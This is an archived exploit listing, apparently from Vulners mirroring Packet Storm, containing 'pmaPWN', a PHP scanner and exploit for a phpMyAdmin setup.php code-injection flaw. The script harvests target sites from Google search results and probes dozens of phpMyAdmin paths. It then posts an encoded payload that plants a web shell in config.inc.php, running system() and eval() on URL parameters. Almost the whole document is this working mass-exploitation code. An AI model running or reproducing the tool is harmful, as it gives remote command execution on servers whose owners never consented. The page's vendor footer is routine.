Vulners
Lucene search
pmaPWN phpMyAdmin Code Injection Scanner
🗓️ 23 Jun 2009 00:00:00Reported by Hacking Expose!Type 
packetstorm🔗 packetstormsecurity.com👁 31 Views
`<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);
if($argc > 1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, [email protected]\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, [email protected]\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "|****************************************************************|\n");
FWrite($Handlex, " pmaPWN.php - d3ck4, [email protected]\n");
FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
FWrite($Handlex, "|****************************************************************|\n\n");
print "[-] Master, where you want to go today? \n";
print "[-] example dork: intitle:phpMyAdmin \n";
fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
$dork = trim(fgets(STDIN));
print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
for($i = 0; $i <= 900; $i+=100) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
$pg = curl_exec($ch);
curl_close($ch);
if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
}
foreach($res as $key) {
foreach($key as $target) {
$total++;
}
}
print "[+] Done. $total rows return.\n";
FWrite($Handlex, "[+] Done. $total rows return.\n");
FClose($Handlex);
foreach($res as $key) {
foreach($key as $target) {
$Handlex = FOpen("pmaPWN.log", "a+");
$real = parse_url($target);
$url = "http://".$real['host'];
print "\n[-] Scanning phpMyAdmin on ".$url."\n";
FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
FClose($Handlex);
sleep(5);
$curlHandle = curl_multi_init();
for ($i = 0;$i < count($list); $i++)
$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
ExecHandle($curlHandle);
for ($i = 0;$i < count($list); $i++)
{
$text[$i] = curl_multi_getcontent ($curl[$i]);
//echo $url.$list[$i]."\n";
$Handlex = FOpen("pmaPWN.log", "a+");
if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
print "\n[+] Testing vulnerable, wait sec..\n";
FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
}
FClose($Handlex);
exploit_site($url.$list[$i]);
}
}
for ($i = 0;$i < count($list); $i++)//remove the handles
curl_multi_remove_handle($curlHandle,$curl[$i]);
curl_multi_close($curlHandle);
sleep(5);
}
}
function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}
function exploit_site($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
$result = curl_exec($ch);
curl_close($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
$result2 = curl_exec($ch2);
curl_close($ch2);
//print $url;
if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
print "\n[+] Exploiting, wait sec..\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
FClose($Handlex);
exploit($url);
}
else {
$Handlex = FOpen("pmaPWN.log", "a+");
print "\n[-] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
FClose($Handlex);
}
}
function exploit($w00t) {
$Handlex = FOpen("pmaPWN.log", "a+");
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
//first get cookie + token
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
$result = curl_exec($curl);
curl_close($curl);
if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
$token = $matches[1][1];
if ($token != '') {
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
print "\n[+] Sending evil payload mwahaha.. \n";
FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec($curl);
curl_close($curl);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
}
else {
print "\n[!] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
return false;
}
FClose($Handlex);
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
//exit();
}
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jun 2009 00:00Current
0.5Low risk
Vulners AI Score0.5